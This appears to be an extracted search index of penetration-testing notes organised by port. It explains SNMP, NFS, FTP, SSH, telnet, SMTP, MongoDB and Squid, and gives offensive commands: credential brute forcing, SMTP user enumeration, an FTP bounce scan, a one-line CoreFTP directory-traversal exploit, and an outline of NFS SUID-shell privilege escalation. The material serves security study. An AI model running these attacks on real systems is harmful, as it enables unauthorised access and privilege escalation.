                        Simple Network Management Protocol (SNMP) was created to monitor network devices. In addition, this protocol can also be used to handle configuration tasks and change settings remotely. SNMP-enabled hardware includes routers, switches, servers, IoT devices, and many other devices that can also be queried and controlled using this standard protocol. Thus, it is a protocol for monitoring and managing network devices.

                        Managers: one or more administrative computers that have the task of monitoring or managing a group of hosts or devices on a computer network, the managed device.

                        Managed devices: routers, switches, servers, IoT devices, and many other devices.

                        Agent: network-management software module that resides on a managed device. An agent has local knowledge of management information and translates that information to or from an SNMP-specific form.

                        In addition to the pure exchange of information, SNMP:

                        • Transmits control commands using agents over UDP port 161.
                        • Enables the use of so-called traps over UDP port 162. These are data packets sent from the SNMP server to the client without being explicitly requested. If a device is configured accordingly, an SNMP trap is sent to the client once a specific event occurs on the server-side.

                        Management Information Base (MIB): For the SNMP client and server to exchange the respective values, the available SNMP objects must have unique addresses known on both sides. And at this point, MIB is born.

                        MIB is an independent format for storing device information. A MIB is a text file in which all queryable SNMP objects of a device are listed in a standardized tree hierarchy. MIB files are written in the Abstract Syntax Notation One (ASN.1) based ASCII text format.

                        They contain Object Identifier (OID), at least one. In addition to the necessary unique address and a name, provides information about the type, access rights, and a description of the respective object. An OID represents a node in a hierarchical namespace. A sequence of numbers uniquely identifies each node, allowing the node's position in the tree to be determined. The longer the chain, the more specific the information. Many nodes in the OID tree contain nothing except references to those below them. The OIDs consist of integers and are usually concatenated by dot notation.

                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#snmpv1-snmpv2-and-snmpv3","title":"SNMPv1, SNMPv2 and SNMPv3","text":"

                        SNMP version 1 (SNMPv1) is used for network management and monitoring. SNMPv1 has no built-in authentication mechanism, meaning anyone accessing the network can read and modify network data. Another main flaw of SNMPv1 is that it does not support encryption, meaning that all data is sent in plain text and can be easily intercepted.

                        SNMPv2 existed in different versions. The version still exists today is v2c, and the extension c means community-based SNMP. A significant problem with the initial execution of the SNMP protocol is that the community string that provides security is only transmitted in plain text, meaning it has no built-in encryption.

                        SNMPv3: The security has been increased enormously for SNMPv3 by security features such as authentication using username and password and transmission encryption (via pre-shared key) of the data. However, the complexity also increases to the same extent, with significantly more configuration options than v2c.

                        How can interception happens? Community strings can be seen as passwords that are used to determine whether the requested information can be viewed or not. It is important to note that many organizations are still using SNMPv2, as the transition to SNMPv3 can be very complex, but the services still need to remain active. SNMP Community strings provide information and statistics about a router or device. The manufacturer default community strings of public and private are often unchanged. In SNMP versions 1 and 2c, access is controlled using a plaintext community string, and if we know the name, we can gain access to it. Examination of process parameters might reveal credentials passed on the command line, which might be possible to reuse for other externally accessible services given the prevalence of password reuse in enterprise environments. Routing information, services bound to additional interfaces, and the version of installed software can also be revealed.

                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#footprinting-snmp","title":"Footprinting SNMP","text":"

                        There are tools like snmpwalk, onesixtyone, and braa.

                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#snmpwalk","title":"snmpwalk","text":"

                        snmpwalk is used to query the OIDs with their information. It retrieves a subtree of management values using SNMP GETNEXT requests.

                        snmpwalk -v2c -c public $ip\n
                        snmpwalk -v 2c -c public $ip 1.3.6.1.2.1.1.5.0\n
                        snmpwalk -v 2c -c private $ip\n

                        If we do not know the community string, we can use onesixtyone and SecLists wordlists to identify these community strings.

                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#onesixtyone-fast-and-simple-snmp-scanner","title":"onesixtyone - Fast and simple SNMP scanner","text":"

                        A tool such as onesixtyone can be used to brute force the community string names using a dictionary file of common community strings such as the dict.txt file included in the GitHub repo for the tool.

                        onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt $ip\n

                        When certain community strings are bound to specific IP addresses, they are named with the hostname of the host, and sometimes even symbols are added to these names to make them more challenging to identify.

                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#braa","title":"braa","text":"

                        Knowing a community string, we can use braa to brute-force the individual OIDs and enumerate the information behind them.

                        braa <community string>@$ip:.1.3.6.*   \n\n    # Example:\n    # braa public@10.129.14.128:.1.3.6.*\n
                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#installing-snmp","title":"Installing SNMP","text":"

                        The default configuration of the SNMP daemon is located at /etc/snmp/snmpd.conf. It contains basic settings for the service, which include the IP addresses, ports, MIB, OIDs, authentication, and community strings. See specifics about the configuration of this file in the manpage.

                        Some classic misconfigurations are:

                        Settings Description rwuser noauth Provides access to the full OID tree without authentication. rwcommunity <community string> <IPv4 address> Provides access to the full OID tree regardless of where the requests were sent from. rwcommunity6 <community string> <IPv6 address> Same access as with rwcommunity with the difference of using IPv6.","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#more-about-snmp-versioning-and-security","title":"More about SNMP versioning and security","text":"

                        Source: wikipedia

                        SNMP is available in different versions, each has its own security issues. SNMP v1 sends passwords in clear-text over the network. Therefore, passwords can be read with packet sniffing. SNMP v2 allows password hashing with MD5, but this has to be configured. Virtually all network management software support SNMP v1, but not necessarily SNMP v2 or v3. SNMP v2 was specifically developed to provide data security, that is authentication, privacy and authorization, but only SNMP version 2c gained the endorsement of the Internet Engineering Task Force (IETF), while versions 2u and 2* failed to gain IETF approval due to security issues. SNMP v3 uses MD5, Secure Hash Algorithm (SHA) and keyed algorithms to offer protection against unauthorized data modification and spoofing attacks. If a higher level of security is needed the Data Encryption Standard (DES) can be optionally used in the cipher block chaining mode. SNMP v3 is implemented on Cisco IOS since release 12.0(3)T. SNMPv3 may be subject to brute force and dictionary attacks for guessing the authentication keys, or encryption keys, if these keys are generated from short (weak) passwords or passwords that can be found in a dictionary.

                        ","tags":["SNMP","port 161","port 162"]},{"location":"1720-5060-5061-voip/","title":"Ports 1720, 5060 and 5061: VoIP","text":"

                        The most common VoIP ports are TCP/5060 and TCP/5061, which are used for the Session Initiation Protocol (SIP). However, the port TCP/1720 may also be used by some VoIP systems for the H.323 protocol, a set of standards for multimedia communication over packet-based networks. Still, SIP is more widely used than H.323 in VoIP systems.

                        The most common SIP requests and methods are:

                        Method Description INVITE Initiates a session or invites another endpoint to participate. ACK Confirms the receipt of an INVITE request. BYE Terminate a session. CANCEL Cancels a pending INVITE request. REGISTER Registers a SIP user agent (UA) with a SIP server. OPTIONS Requests information about the capabilities of a SIP server or user agent, such as the types of media it supports."},{"location":"2049-nfs-network-file-system/","title":"Port 2049 - NFS Network File System","text":"

                        Network File System (NFS) is a network file system developed by Sun Microsystems and has the same purpose as SMB. Its purpose is to access file systems +over a network as if they were local. However, it uses an entirely different protocol. NFS is used between Linux and Unix systems. This means that NFS clients cannot communicate directly with SMB servers.

                        NFS is an Internet standard that governs the procedures in a distributed file system. While NFS protocol version 3.0 (NFSv3), which has been in use for many years, authenticates the client computer, this changes with NFSv4. Here, as with the Windows SMB protocol, the user must authenticate.

                        Version Features NFSv2 It is older but is supported by many systems and was initially operated entirely over UDP. NFSv3 It has more features, including variable file size and better error reporting, but is not fully compatible with NFSv2 clients. NFSv4 It includes Kerberos, works through firewalls and on the Internet, no longer requires portmappers, supports ACLs, applies state-based operations, and provides performance improvements and high security. It is also the first version to have a stateful protocol.

                        NFS is based on the Open Network Computing Remote Procedure Call (ONC-RPC/SUN-RPC) protocol exposed on TCP and UDP ports 111, which uses External Data Representation (XDR) for the system-independent exchange of data. The NFS protocol has no mechanism for authentication or authorization. Instead, authentication is completely shifted to the RPC protocol's options.

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#configuration-file","title":"Configuration file","text":"

                        The /etc/exports file contains a table of physical filesystems on an NFS server accessible by the clients.

                        The default exports file also contains some examples of configuring NFS shares. First, the folder is specified and made available to others, and then the rights they will have on this NFS share are connected to a host or a subnet. Finally, additional options can be added to the hosts or subnets.

                        Option Description rw Read and write permissions. ro Read only permissions. sync Synchronous data transfer. (A bit slower) async Asynchronous data transfer. (A bit faster) secure Ports above 1024 will not be used. insecure Ports above 1024 will be used. no_subtree_check This option disables the checking of subdirectory trees. root_squash Assigns all permissions to files of root UID/GID 0 to the UID/GID of anonymous, which prevents root from accessing files on an NFS mount.

                        We can take a look at the insecure option. This is dangerous because users can use ports above 1024. The first 1024 ports can only be used by root. This prevents the fact that no users can use sockets above port 1024 for the NFS service and interact with it.

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#mounting-a-nfs-shared-folder","title":"Mounting a NFS shared folder","text":"
                        # Share the folder `/mnt/nfs` to the subnet $ip\necho '/mnt/nfs  $ip/24(sync,no_subtree_check)' >> /etc/exports\n\n# Restart the NFS service\nsystemctl restart nfs-kernel-server \n\nexportfs\n

                        We have shared the folder /mnt/nfs to the subnet IP/24 with the setting shown above. This means that all hosts on the network will be able to mount this NFS share and inspect the contents of this folder.

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#footprinting-the-service","title":"Footprinting the service","text":"
                        sudo nmap $ip -p111,2049 -sV -sC\n\n# Also, run all NSE NFS scripts\nsudo nmap --script nfs* $ip -sV -p111,2049\n

                        Once we have discovered such an NFS service, we can mount it on our local machine. For this, we can create a new empty folder to which the NFS share will be mounted. Once mounted, we can navigate it and view the contents just like our local system.

                        # Show Available NFS Shares\nshowmount -e $ip\n\n# Mounting NFS Share\nmkdir target-NFS\nsudo mount -t nfs $ip:/ ./target-NFS/ -o nolock\ncd target-NFS\ntree .\n\n# List Contents with Usernames & Group Names\nls -l mnt/nfs/\n\n# List Contents with UIDs & GUIDs\nls -n mnt/nfs/\n\n# Unmount the shared\nsudo umount ./target-NFS\n

                        By default nfs server has root_squash on which makes client access nobody:nogroup. To bypass it, sudo su your user to be root.

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#attacking-wrong-configured-nfs","title":"Attacking wrong configured NFS","text":"

                        It is important to note that if the root_squash option is set, we cannot edit the backup.sh file even as root.

                        We can also use NFS for further escalation. For example, if we have access to the system via SSH and want to read files from another folder that a specific user can read, we would need to upload a shell to the NFS share that has the SUID of that user and then run the shell via the SSH user.

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#more","title":"More","text":"

                        https://vk9-sec.com/2049-tcp-nfs-enumeration/.

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"21-ftp/","title":"21 ftp","text":"

                        The File Transfer Protocol (FTP) is a standard communication protocol used to transfer computer files from a server to a client on a computer network. FTP is built on a client\u2013server model architecture using separate control and data connections between the client and the server. The FTP runs within the application layer of the TCP/IP protocol stack. Thus, it is on the same layer as HTTP or POP.

                        FTP users may authenticate themselves with a clear-text sign-in protocol, generally in the form of a username and password. However, they can connect anonymously if the server is configured to allow it. For secure transmission that protects the username and password and encrypts the content, FTP is often secured with SSL/TLS (FTPS) or replaced with SSH File Transfer Protocol (SFTP).

                        However, if the network administrators choose to wrap the connection with the SSL/TLS protocol or tunnel the FTP connection through SSH to add a layer of encryption that only the source and destination hosts can decrypt, this would successfully foil most Man-in-the-Middle attacks.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#how-it-works","title":"How it works","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#the-connection","title":"The connection","text":"

                        1. First, the client and server establish a control channel through TCP port 21. The client sends commands to the server, and the server returns status codes.

                        2. Then both communication participants can establish the data channel via TCP port 20. This channel is used exclusively for data transmission, and the protocol watches for errors during this process.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#active-and-passive-ftp","title":"Active and passive FTP","text":"

                        A distinction is made between active and passive FTP. In the active variant, the client establishes the connection as described via TCP port 21 and thus informs the server via which client-side port the server can transmit its responses. However, if a firewall protects the client, the server cannot reply because all external connections are blocked. For this purpose, the passive mode has been developed. Here, the server announces a port through which the client can establish the data channel. Since the client initiates the connection in this method, the firewall does not block the transfer.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#installation","title":"Installation","text":"

                        You may need to install ftp service. Run:

                        sudo apt install ftp -y\n

                        Then to connect with ftp, run:

                        ftp $ip \n

                        The prompt will ask us for the username we want to log in with. Here is where the magic happens. A typical misconfiguration for running FTP services allows an anonymous account to access the service like any other authenticated user. The anonymous username can be input when the prompt appears, followed by any password whatsoever since the service will disregard the password for this specific account.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#basic-usage","title":"Basic usage","text":"
                        # Connect with ftp\nftp $ip\n\n# If anonymous login is allowed, enter anonymous as user and press Enter when prompted for password\n\n# Give you a list of available commands\nhelp\n\n# List directories and files\nls\n\n# List recursively. Not always available, only in some configurations\nls -R\n\n# Change to a directory\ncd <folder>\n\n# Download a file to your localhost\nget <nameofFileInOrigin> <nameOfFileInLocalhost>\n\n# Upload a file from your localhost\nput <yourfile>\n\n# Exit connection\nquit\n\n# Connect in passive mode\nftp -p $ip\n# The `-p` flag in the `ftp` command on Linux is used to enable passive mode for the file transfer protocol (FTP) connection. Passive mode is a mode of FTP where the data connection is initiated by the client rather than the server. This can be useful when the client is behind a firewall or NAT (Network Address Translation) that does not allow incoming connections. \n

                        More posibilities with wget:

                        # Download all available files at once\nwget -m --no-passive ftp://anonymous:anonymous@$ip\n
                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#footprinting-with-nmap","title":"Footprinting with nmap","text":"
                        # Locate all ftp scripts related\nfind / -type f -name ftp* 2>/dev/null | grep scripts\n\n# Run a general scanner for version, mode aggresive and perform default scripts\nsudo nmap -sV -p21 -sC -A $ip\n# ftp-anon NSE script checks whether the FTP server allows anonymous access.\n# ftp-syst, for example, executes the `STAT` command, which displays information about the FTP server status.\n

                        See more about nmap for scanning, running scripts and footprinting

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#attacking-ftp","title":"Attacking FTP","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#brute-forcing-with-medusa","title":"Brute forcing with Medusa","text":"

                        Medusa Cheat sheet.

                        # Brute force FTP logging\nmedusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp\n# -u: username\n# -U: list of Usernames\n# -p: password\n# -P: list of passwords\n# -h: host /IP\n# -M: protocol to bruteforce\n

                        However Medusa is very slow in comparison to hydra:

                        # Example for ftp in a non default port\nhydra -L users.txt -P pass.txt ftp://$ip:2121\n
                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#ftp-bounce-attack","title":"FTP Bounce Attack","text":"

                        An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. For instance, consider we are targetting an FTP Server\u00a0FTP_DMZ\u00a0exposed to the internet. Another device within the same network,\u00a0Internal_DMZ, is not exposed to the internet. We can use the connection to the\u00a0FTP_DMZ\u00a0server to scan\u00a0Internal_DMZ\u00a0using the FTP Bounce attack and obtain information about the server's open ports.

                        nmap -Pn -v -n -p80 -b anonymous:password@$ipFTPdmz $ipINTERNALdmz\n# -b The\u00a0`Nmap`\u00a0-b flag can be used to perform an FTP bounce attack: \n
                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#coreftp-server-build-725-directory-traversal-authenticated","title":"CoreFTP Server build 725 - Directory Traversal (Authenticated)","text":"

                        CVE-2022-22836 | \u00a0exploit

                        Summary: This FTP service uses an HTTP POST request to upload files. However, the CoreFTP service allows an HTTP PUT request, which we can use to write content to files.

                        The\u00a0exploit\u00a0for this attack is relatively straightforward, based on a single\u00a0cURL\u00a0command.

                        curl -k -X PUT -H \"Host: <IP>\" --basic -u <username>:<password> --data-binary \"PoC.\" --path-as-is https://<IP>/../../../../../../whoops\n

                        We create a raw HTTP\u00a0PUT\u00a0request (-X PUT) with basic auth (--basic -u <username>:<password>), the path for the file (--path-as-is https://<IP>/../../../../../whoops), and its content (--data-binary \"PoC.\") with this command. Additionally, we specify the host header (-H \"Host: <IP>\") with the IP address of our target system.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#other-ftp-services","title":"Other FTP services","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#tftp","title":"TFTP","text":"

                        Trivial File Transfer Protocol (TFTP) is simpler than FTP and performs file transfers between client and server processes.

                        • It does not provide user authentication and other valuable features supported by FTP.
                        • It uses UDP.
                        • It does not require the user's authentication

                        Because of the lack of security, TFTP, unlike FTP, may only be used in local and protected networks.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#basic-usage_1","title":"Basic usage","text":"
                        # Sets the remote host, and optionally the port, for file transfers.\nconnect\n\n# Transfers a file or set of files from the remote host to the local host.\nget\n\n# Transfers a file or set of files from the local host onto the remote host\nput\n\n# Exits tftp\nquit\n\n# Shows the current status of tftp, including the current transfer mode (ascii or binary), connection status, time-out value, and so on\nstatus\n\n# Turns verbose mode, which displays additional information during file transfer, on or off.\nverbose \n\n# Unlike the FTP client, TFTP does not have directory listing functionality.\n
                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#vsftpd","title":"vsFTPd","text":"

                        One of the most used FTP servers on Linux-based distributions is vsFTPd.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#installation_1","title":"Installation","text":"
                        sudo apt install vsftpd \n
                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#configuration-file","title":"Configuration file","text":"

                        The default configuration of vsFTPd can be found in /etc/vsftpd.conf.

                        Setting Description listen=NO Run from inetd or as a standalone daemon? listen_ipv6=YES Listen on IPv6 ? anonymous_enable=NO Enable Anonymous access? local_enable=YES Allow local users to login? dirmessage_enable=YES Display active directory messages when users go into certain directories? use_localtime=YES Use local time? xferlog_enable=YES Activate logging of uploads/downloads? connect_from_port_20=YES Connect from port 20? secure_chroot_dir=/var/run/vsftpd/empty Name of an empty directory pam_service_name=vsftpd This string is the name of the PAM service vsftpd will use. rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem The last three options specify the location of the RSA certificate to use for SSL encrypted connections. rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key ssl_enable=NO

                        In addition, there is a file called /etc/ftpusers that we also need to pay attention to, as this file is used to deny certain users access to the FTP service.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"22-ssh/","title":"22 ssh","text":"

                        Secure Shell (SSH) enables two computers to establish an encrypted and direct connection within a possibly insecure network on the standard port TCP 22.

                        Implemented natively on all Linux distributions and MacOS, SSH can also be used on Windows, with an appropriate program. The well-known OpenBSD SSH (OpenSSH) server on Linux distributions is an open-source fork of the original and commercial SSH server from SSH Communication Security.

                        There are two competing protocols: SSH-1 and SSH-2. SSH-2, also known as SSH version 2, is a more advanced protocol than SSH version 1 in encryption, speed, stability, and security. For example, SSH-1 is vulnerable to MITM attacks, whereas SSH-2 is not.

                        The SSH server runs on TCP port 22 by default, to which we can connect using an SSH client. This service uses three different cryptography operations/methods: symmetric encryption, asymmetric encryption, and hashing.

                        ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#footprinting-ssh","title":"Footprinting ssh","text":"","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#ssh-audit","title":"ssh-audit","text":"
                        # Installation and execution\ngit clone https://github.com/jtesta/ssh-audit.git \n\n# Execute\ncd ssh-audit\n./ssh-audit.py $ip\n
                        ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#nmap","title":"nmap","text":"

                        Brute force script:

                        nmap $ip -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/nmap/nselib/data/passwords.lst\n

                        OpenSSH 7.6p1 Ubuntu ubuntu0.3 is well known for some vulnerabilities.

                        ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#connect-with-ssh","title":"Connect with ssh","text":"
                        ssh <user>@$ip\n\n# connect with a ssh key\nssh -i id_rsa <user>@$ip\n
                        ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#installing-a-ssh-service","title":"Installing a ssh service","text":"

                        The sshd_config file, responsible for the OpenSSH server, has only a few of the settings configured by default. However, the default configuration includes X11 forwarding, which contained a command injection vulnerability in version 7.2p1 of OpenSSH in 2016.

                        Configuration file: /etc/ssh/sshd_config.

                        Common misconfigurations:

                        Setting Description PasswordAuthentication yes Allows password-based authentication. PermitEmptyPasswords yes Allows the use of empty passwords. PermitRootLogin yes Allows to log in as the root user. Protocol 1 Uses an outdated version of encryption. X11Forwarding yes Allows X11 forwarding for GUI applications. AllowTcpForwarding yes Allows forwarding of TCP ports. PermitTunnel Allows tunneling. DebianBanner yes Displays a specific banner when logging in.

                        Some instructions and hardening guides can be used to harden our SSH servers.

                        ","tags":["pentesting","web pentesting","port 22"]},{"location":"23-telnet/","title":"23 telnet","text":"

                        Sometimes, due to configuration mistakes, some important accounts can be left with blank passwords for the sake of accessibility. This is a significant issue with some network devices or hosts, leaving them open to simple brute-forcing attacks, where the attacker can try logging in sequentially, using a list of usernames with no password input. Some typical important accounts have self-explanatory names, such as:

                        • admin
                        • administrator
                        • root

                        A direct way to attempt logging in with these credentials in hopes that one of them exists and has a blank password is to input them manually in the terminal when the hosts request them. If the list were longer, we could use a script to automate this process, feeding it a wordlist for usernames and one for passwords.

                        Typically, the wordlists used for this task consist of typical people names, abbreviations, or data from previous database leaks. For now, we can resort to manually trying these three main usernames above.

                        ","tags":["telnet","port 23"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/","title":"Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)","text":"

                        The Simple Mail Transfer Protocol (SMTP) is a protocol for sending emails in an IP network. y default, SMTP servers accept connection requests on port 25. However, newer SMTP servers also use other ports such as TCP port 587. This port is used to receive mail from authenticated users/servers, usually using the STARTTLS command. SMTP works unencrypted without further measures and transmits all commands, data, or authentication information in plain text. To prevent unauthorized reading of data, the SMTP is used in conjunction with SSL/TLS encryption. Under certain circumstances, a server uses a port other than the standard TCP port 25 for the encrypted connection, for example, TCP port 465.

                        Mail User Agent (MUA): SMTP client who sends the email. MUA converts it into a header and a body and uploads both to the SMTP server.

                        Mail Transfer Agent (MTA): The MTA checks the e-mail for size and spam and then stores it. At this point of the process, this MTA works as the sender's server. The MTA then searches the DNS for the IP address of the recipient mail server. On arrival at the destination SMTP server, the receiver's MTA reassembles the data packets to form a complete e-mail.

                        Mail Submission Agent (MSA): Proxy that occasionally precedes the MTA to relieve the load. It checks the validity, i.e., the origin of the e-mail. This MSA is also called Relay server.

                        Mail delivery agent (MDA): It deals with transfering the email to the recipient's mailbox.

                        ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#extended-smtp-esmtp","title":"Extended SMTP (ESMTP)","text":"

                        Extended SMTP (ESMTP) deals with the main two shortcomings of SMTP protocol:

                        • In SMTP, users are not authenticated, therefore the sender is unreliable.
                        • SMTP doesn't have confirmations.

                        For this, ESMTP uses TLS for encryption and AUTH PLAIN extension for authentication.

                        ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#basic-commands","title":"Basic commands","text":"
                        # We can use telnet protocol to connect to a SMTP server\ntelnet $ip 25\n\n# AUTH is a service extension used to authenticate the client\nAUTH PLAIN  \n\n# The client logs in with its computer name and thus starts the session. It also lists all available commands\nEHLO\n    # Example: \n    # HELO mail1.inlanefreight.htb\n\n# The client names the email sender\nMAIL FROM   \n\n# The client names the email recipient\nRCPT TO\n\n# The client initiates the transmission of the email\nDATA \n\n# The client aborts the initiated transmission but keeps the connection between client and server\nRSET\n\n# The client checks if a mailbox is available for message transfer. This also means that this command could  be used to enumerate existing users on the system. However, this does not always work. Depending on how the SMTP server is configured, the SMTP server may issue `code 252` and confirm the existence of a user that does not exist on the system.\nVRFY\n# Example: VRFY root\n\n# The client also checks if a mailbox is available for messaging with this command \nEXPN\n\n# The client requests a response from the server to prevent disconnection due to time-out\nNOOP\n\n# The client terminates the session\nQUIT\n

                        If we are connected to a proxy and we want this proxy to connect to a SMTP server, the command that we would send than would look something like this:

                        CONNECT 10.129.14.128:25 HTTP/1.0\n

                        Example:

                        telnet $ip 25  \n\n# Trying 10.129.14.128... \u00e7\n# Connected to 10.129.14.128. \n# Escape character is '^]'. \n# 220 ESMTP Server   \n\nEHLO inlanefreight.htb  \n# 250-mail1.inlanefreight.htb \n# 250-PIPELINING \n# 250-SIZE 10240000 \n# 250-ETRN \n# 250-ENHANCEDSTATUSCODES \n# 250-8BITMIME \n# 250-DSN \n# 250-SMTPUTF8 \n# 250 CHUNKING   \n\nMAIL FROM: <cry0l1t3@inlanefreight.htb>  \n# 250 2.1.0 Ok   \n\nRCPT TO: <mrb3n@inlanefreight.htb> NOTIFY=success,failure  \n# 250 2.1.5 Ok   \n\nDATA  \n# 354 End data with <CR><LF>.<CR><LF>  \n\n# From: <cry0l1t3@inlanefreight.htb> \n# To: <mrb3n@inlanefreight.htb> \n# Subject: DB \n# Date: Tue, 28 Sept 2021 16:32:51 +0200 \n\n`Hey man, I am trying to access our XY-DB but the creds dont work.  Did you make any changes there?.`  \n# 250 2.0.0 Ok: queued as 6E1CF1681AB   \n\nQUIT  \n# 221 2.0.0 Bye Connection closed by foreign host.`\n
                        mynetworks = 0.0.0.0/0\n

                        With this setting, this SMTP server can send fake emails and thus initialize communication between multiple parties. Another attack possibility would be to spoof the email and read it.

                        ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#footprinting-smtp","title":"Footprinting SMTP","text":"
                        sudo nmap $ip -sC -sV -p25\n\nsudo nmap $ip -p25 --script smtp-open-relay -v\n

                        Scripts for user enumeration:

                        # Enumerate users:\nfor user in $(cat users.txt); do echo VRFY $user | nc -nv -w 6 $ip 25  ; done\n# -w: Include a delay in passing the argument. In seconds.\n

                        Results from script in user enumeration:

                        (UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n252 2.0.0 root\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n550 5.1.1 <lala>: Recipient address rejected: User unknown in local recipient table\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n252 2.0.0 robin                 \n
                        ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#postfix-an-example-of-a-smtp-server","title":"Postfix, an example of a SMTP server","text":"","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#configuration-file","title":"Configuration file","text":"

                        See how to install postfix server.

                        The configuration file for Porsfix service is /etc/postfix/main.cf

                        ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"27017-27018-mongodb/","title":"27017 - 27018 mongoDB","text":"

                        https://book.hacktricks.xyz/network-services-pentesting/27017-27018-mongodb.

                        More about mongo.

                        ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#description","title":"Description","text":"

                        27017 - The default port for mongod and mongos instances. You can change this port with port or --port.27018 - The default port for mongod when running with --shardsvr command-line option or the shardsvr value for the clusterRole setting in a configuration file. MongoDB is an open source database management system (DBMS) that uses a document-oriented database model which supports various forms of data.

                        ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#to-connect-to-a-mongodb","title":"To connect to a MongoDB","text":"

                        More about mongo.

                        By default mongo does not require password. Admin is a common mongo database default admin user.

                        mongo $ip\nmongo <HOST>:<PORT>\nmongo <HOST>:<PORT>/<DB>\nmongo <database> -u <username> -p '<password>'\n
                        ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#some-mongodb-commands","title":"Some MongoDB commands","text":"

                        More about mongo.

                        # Enter in mongodb application\nmongo\n\n# See help\nhelp\n\n# Display databases\nshow dbs\n\n# Select a database\nuse <db>\n\n# Display collections in a database\nshow collections\n\n# Dump a collection\ndb.<collection>.find()\n\n# Return the number of records of the collection\ndb.<collection>.count() \n\n# Find in current db the username admin\ndb.current.find({\"username\":\"admin\"}) \n\n# We can dump the contents of the documents present in the flag collection by using the db.collection.find() command. Let's replace the collection name flag in the command and also use pretty() in order to receive the output in a beautified format.\n
                        ","tags":["mongodb","port 27017","port 27018"]},{"location":"3128-squid/","title":"3128 Squid","text":"

                        Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic.

                        Squid is a widely used open-source proxy server and web cache daemon. It primarily operates as a proxy server, which means it acts as an intermediary between client devices (such as computers or smartphones) and web servers, facilitating requests and responses between them.

                        Squid is commonly deployed in network environments to improve performance, enhance security, and manage internet access. Squid can cache frequently requested web content locally. When a client requests a web page or object that Squid has cached, it serves the content from its cache instead of fetching it from the original web server.

                        Access Control: Squid provides robust access control mechanisms. Administrators can configure rules to control which clients are allowed to access specific websites or web services.

